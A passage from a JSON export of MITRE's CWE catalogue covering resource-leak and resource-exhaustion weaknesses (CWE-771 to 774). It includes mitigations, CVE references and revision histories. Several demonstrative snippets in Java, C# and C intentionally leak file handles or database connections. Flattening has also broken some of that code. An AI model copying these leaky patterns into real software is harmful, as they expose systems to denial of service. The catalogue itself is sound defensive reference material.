of which opens a separate window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1700"},{"Reference":"CVE-2005-4650","Description":"CMS does not restrict the number of searches that can occur simultaneously, leading to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4650"},{"Reference":"CVE-2020-15100","Description":"web application scanner attempts to read an excessively large file created by a user, causing process termination","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15100"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Close resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER12-J","Entry_Name":"Avoid memory and resource leaks during serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC05-J","Entry_Name":"Do not exhaust heap space"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"125"}},{"attr":{"@_CAPEC_ID":"130"}},{"attr":{"@_CAPEC_ID":"147"}},{"attr":{"@_CAPEC_ID":"197"}},{"attr":{"@_CAPEC_ID":"229"}},{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}},{"attr":{"@_CAPEC_ID":"469"}},{"attr":{"@_CAPEC_ID":"482"}},{"attr":{"@_CAPEC_ID":"486"}},{"attr":{"@_CAPEC_ID":"487"}},{"attr":{"@_CAPEC_ID":"488"}},{"attr":{"@_CAPEC_ID":"489"}},{"attr":{"@_CAPEC_ID":"490"}},{"attr":{"@_CAPEC_ID":"491"}},{"attr":{"@_CAPEC_ID":"493"}},{"attr":{"@_CAPEC_ID":"494"}},{"attr":{"@_CAPEC_ID":"495"}},{"attr":{"@_CAPEC_ID":"496"}},{"attr":{"@_CAPEC_ID":"528"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-386"}},{"attr":{"@_External_Reference_ID":"REF-387"}},{"attr":{"@_External_Reference_ID":"REF-388"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, "Protecting Against Denial of Service Attacks" Page 517"}},{"attr":{"@_External_Reference_ID":"REF-672"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, "Resource Limits", Page 574"}}]},"Notes":{"Note":[{"#text":"This entry is different from uncontrolled resource consumption (CWE-400) in that there are other weaknesses that are related to inability to control resource consumption, such as holding on to a resource too long after use, or not correctly keeping track of active resources so that they can be managed and released when they are finished (CWE-771).","attr":{"@_Type":"Relationship"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Observed_Examples, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"771":{"attr":{"@_ID":"771","@_Name":"Missing Reference to Active Allocated Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly maintain a reference to a resource that has been allocated, which prevents the resource from being reclaimed.","Extended_Description":"This does not necessarily apply in languages or frameworks that automatically perform garbage collection, since the removal of all references may act as a signal that the resource is ready to be reclaimed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"772":{"attr":{"@_ID":"772","@_Name":"Missing Release of Resource after Effective Lifetime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.","Extended_Description":"When a resource is not released after use, it can allow attackers to cause a denial of service by causing the allocation of resources without triggering their release. Frequently-affected resources include memory, CPU, disk space, power or battery, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated."]}},{"Phase":"Implementation","Description":"It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free resources in a function. If you allocate resources that you intend to free upon completion of the function, you must be sure to free the resources at all exit points for that function including error conditions."},{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-81"},"Intro_Text":"The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}fil.Close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure."},{"Intro_Text":"The following code attempts to open a new connection to a database, process the results returned by the database, and close the allocated SqlConnection object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();","xhtml:br":["","","","","",""]}},"Body_Text":"The problem with the above code is that if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries."},{"attr":{"@_Demonstrative_Example_ID":"DX-82"},"Intro_Text":"This code attempts to open a connection to a database and catches any exceptions that may occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch ( Exception e ) {}","xhtml:div":[{"#text":"Connection con = DriverManager.getConnection(some_connection_string);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log( e );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-83"},"Intro_Text":"Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();...","xhtml:br":["","","","","","","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-84"},"Intro_Text":"The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int decodeFile(char* fName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[BUF_SZ];FILE* f = fopen(fName, \\"r\\");if (!f) {}else {}fclose(f);return DECODE_SUCCESS;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"cannot open %s\\\\n\\", fName);return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (fgets(buf, BUF_SZ, f)) {}","xhtml:div":{"#text":"if (!checkChecksum(buf)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"}},{"#text":"decodeBlock(buf);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}]}}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"},{"Reference":"CVE-2001-0830","Description":"Sockets not properly closed when attacker repeatedly connects and disconnects from server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830"},{"Reference":"CVE-1999-1127","Description":"Does not shut down named pipe connections if malformed data is sent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1127"},{"Reference":"CVE-2009-2858","Description":"Chain: memory leak (CWE-404) leads to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2858"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-2122","Description":"Port scan triggers CPU consumption with processes that attempt to read data from closed sockets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2122"},{"Reference":"CVE-2007-4103","Description":"Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4103"},{"Reference":"CVE-2002-1372","Description":"Return values of file/socket operations not checked, allowing resultant consumption of file descriptors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1372"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-772"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-772"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"469"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-772"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-772"}}]},"Notes":{"Note":[{"#text":"\\"Resource exhaustion\\" (CWE-400) is currently treated as a weakness, although it is more like a category of weaknesses that all have the same type of consequence. While this entry treats CWE-400 as a parent in view 1000, the relationship is probably more appropriately described as a chain.","attr":{"@_Type":"Maintenance"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"773":{"attr":{"@_ID":"773","@_Name":"Missing Reference to Active File Descriptor or Handle","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly maintain references to a file descriptor or handle, which prevents that file descriptor/handle from being reclaimed.","Extended_Description":"This can cause the software to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"771","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"774":{"attr":{"@_ID":"774","@_Name":"Allocation of File Descriptors or Handles Without Limits or Throttling","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allocates file descriptors or handles on behalf of an actor without imposing any restrictions on how many descriptors can be allocated, in violation of the intended security policy for that actor.","Extended_Description":"This can cause the software to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"File Descriptor Exhaustion"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"When allocating resources without limits, an attacker could prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, "Resource Limits", Page 574"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships"},{"Modification_Name":"CWE Content 